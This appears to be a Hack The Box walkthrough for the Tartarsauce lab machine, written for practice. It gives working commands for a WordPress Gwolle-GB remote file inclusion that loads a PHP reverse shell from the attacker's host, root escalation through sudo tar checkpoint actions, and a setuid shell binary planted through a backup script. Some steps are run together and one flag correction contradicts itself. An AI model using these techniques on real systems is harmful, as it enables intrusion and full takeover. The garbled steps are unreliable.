This hack the box tartarsauce walkthrough covers how to get root level access for the Tartarsauce box. One of my favorite boxes is Active which is good for strengthening your Windows privilege escalation skills.
Here is what you will learn:
- How to exploit WordPress
- How to exploit RFI Vulnerabilities
- Exploiting system scripts
- Linux Privilege Escalation
Table of Contents
Initial Enumeration
An nmap scan reveals one open port on the Tartarsauce box and that is HTTP TCP 80.
Web Enumeration
Web enumeration is naturally the next step as we just discovered a runing web service open on TCP 80. Using gobuster.
gobuster dir -u http://10.10.10.88 -w ~/seclists/Discovery/Web-Content/common.txt -v | grep Found
Then I run gobuster again on the newly found directory to seek further discovery.
gobuster dir -u http://10.10.10.88/webservices -w ~/seclists/Discovery/Web-Content/common.txt -v | grep Found
How to Exploit WordPress
One thing that we do find out is that the webserver is hosting a WordPress installation.
Enumerate using wpscan
A regular wpscan is too limited in this scenario and fails to find any plugins. There is a clue that helps point out what to do next. The output from wpscan says it has failed to enumerate plugins using passive methods so the next scan will need to use aggressive methods.
wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p,u --plugins-detection aggressiveHTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request: http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website] https://www.exploit-db.com/exploits/38861
to do that
http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.17copy php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php ~/.rename it to wp-load.php
cp php-reverse-shell.php wp-load.phpEdit the details of the shell file and enter the ip address of your Kali machine and the port to receive a shell on such as 1234.
Check our user’s sudo privileges
sudo -lThis means the www-data user can run the tar command with sudo privilege with no password as the user onuma. Nice!
Abuse tar for priv escalation
Some Googling leads me to an article that has a few suggestions for abusing common Linux commands to escalate privileges.
That means creating an empty file and name it testfile it does not matter what is in the file as long as it does not interfere with the process.
sudo -u onuma /bin/tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bashsudo -u onuma /bin/tar cf /dev/null testfile.sh --checkpoint=1 --checkpoint-action=exec=/bin/bashThere is a typo in the article! the correct flag is checkpoint-action=exe=/bin/bash
python -c "import pty; pty.spawn('/bin/bash')"Compile Setuid File Exploit
The objective here is to get the backuperer script to untar the tar we will place in the webserver’s directory.
First compile the target’s 32 bit arch setuid binary which will spawn a new shell process as root if done correctly.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main( int argc, char *argv[] )
{
setreuid(0,0);
execve("/bin/sh", NULL, NULL);
}Now compile setuid.c and chmod its file permissions. These will carry over to the target.
gcc -m32 setuid.c -o setuid
chmod 6555 setuidInstall a dependency first if needed.
apt-get install gcc-multilibNow tar up the directory making sure the file is owned by root.
root@kali:~/tartarsauce# tar -zcvf setuid.tar.gz var/
var/
var/www/
var/www/html/
var/www/html/setuid
root@kali:~/tartarsauce# ls -al
total 32
drwxr-xr-x 3 root root 4096 Nov 24 17:34 .
drwxr-xr-x 33 root root 4096 Nov 24 17:33 ..
-r-xr-xr-x 1 root root 15532 Nov 24 17:33 setuid
-rw-r--r-- 1 root root 2767 Nov 24 17:35 setuid.tar.gz
drwxr-xr-x 3 root root 4096 Nov 24 17:34 var
By putting the setuid binary in the tar file the backuperer script will unravel the tar and allow execution of the setuid file as root. This will give root access.
.5152194081bd913ef3b1012d5e89327c620a8aa0
nc 10.10.10.88 4321 > .72afa666dfe1689ad54a752f3f1be94763d4e162 4321 > .72afa666dfe1689ad54a752f3f1be94763d4e162
wget http://10.10.14.17:8000/.e507f25bde8bac0f8c5b95f3de9b97dcabad4616From there the SUID binary executes and we have access to the root.txt file found in the root user’s home directory.